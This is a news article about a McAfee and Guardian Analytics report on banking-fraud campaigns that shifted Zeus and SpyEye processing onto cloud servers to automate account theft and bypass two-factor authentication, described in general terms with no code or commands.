Researchers say criminals are moving their malware heavy lifting from end user PCs to servers in the cloud.
The same flexibility and freedom companies get from having their software and services hosted in the cloud is enabling cybercriminals to conduct highly automated online banking theft — without doing much of the necessary information processing on their victims’ own computers.
Security and privacy experts have long worried that criminals would launch attacks on the servers storing the data in cloud environments. But, a report released this week from McAfee and Guardian Analytics shows that criminals are now using the cloud infrastructure itself to get more capability out of their campaigns.
“They are leveraging the cloud,” Brian Contos, senior director of emerging markets at McAfee, said in an interview. “This is the first time we’ve ever seen this.”
Basically, what researchers uncovered was a series of highly sophisticated campaigns designed to siphon money out of high balance bank accounts in Europe, the U.S. and South America through automated transfers. Like most online consumer bank fraud, the attacks started off with a phishing e-mail, typically pretending to be from a victim’s bank and urging the recipient to click a link to change the account password. Once the link is clicked, a Trojan — in this case Zeus or SpyEye — was downloaded onto the victim’s computer, in early versions of the attacks. In later versions the malware is operating from a server.
When the victim goes to log into the bank site, the malware would use a so-called Web inject technique to overlay what looks like the bank Web page in the victim’s browser. However, behind the scenes and totally transparent to the victim, something entirely different is happening. While the victim thinks he or she is transferring money from a savings account into a checking account, for instance, the malware is actually transferring any amount of money the criminals specify into their own account.
Traditionally, banking malware like this will handle the processing from the victim’s PC. But in this case, the heavy lifting of the malware is being done on the server in the cloud, according to Contos. In the operations McAfee and Guardian Analytics uncovered the servers were located in eastern European countries, he said. The servers are located mostly at “bullet proof” ISP that have lax policies and are re-located frequently to avoid discovery.
“The servers are sitting within ISPs that are designed specifically to take part in fraud,” he said, adding that the criminals in these campaigns even managed to bypass two-factor authentication systems commonly used in European consumer online banking. For instance, not only does a consumer type in a username and password to a site, but also swipes a card into a special card reader attached to the PC that provides additional data proof that the legitimate user is accessing the account.
The log-in or authentication “information is taken from the malware (on the PC) and redirected to the server in real time, Contos said. “That server takes that data and authenticates against the victim’s bank account, all within seconds.”
The servers — at least 60 were used in these operations — provided the criminals with the ability to fully automate the attacks, so less manual intervention is needed on the part of the attacker to do things like adjust the amount to steal that will be below fraud detection levels.
“The server is the brains that does all the transactions in the bank account,” he said. Rather than having the malware residing on the victim’s computer take charge of the attack functions, like stealing the data and sending it off somewhere, the attack itself is performed by the server.
“All the intelligence is sitting on the server side that they are putting in the cloud,” he said. “The criminals don’t have to change anything on the end user side. They can make modifications on the server side. They still have malware on the user’s machine, but it can be smaller and much less intelligent than in the past.”
The malware on the victim’s computer can stay simple and doesn’t need to be updated to change the functionality of the attack; that can be done on the server side.”It’s all designed to make (the attack) scalable and agile,” Contos said. “This also allows criminals to keep attacks alive as long as possible” because there is less activity on the end user’s computer that can be detected.
Contos predicts this is the future of malware operations, much like many online business operations have moved to the cloud to save time and resources for companies. Once the malware is on an end user’s computer, criminals can use those computers for a multitude of operations and attacks.
“We will see people repurposing malware for this purpose,” he said. “They will use the install base (of an existing botnet, for example) and ride that wave and set up their own servers” to use the victim computers for theft.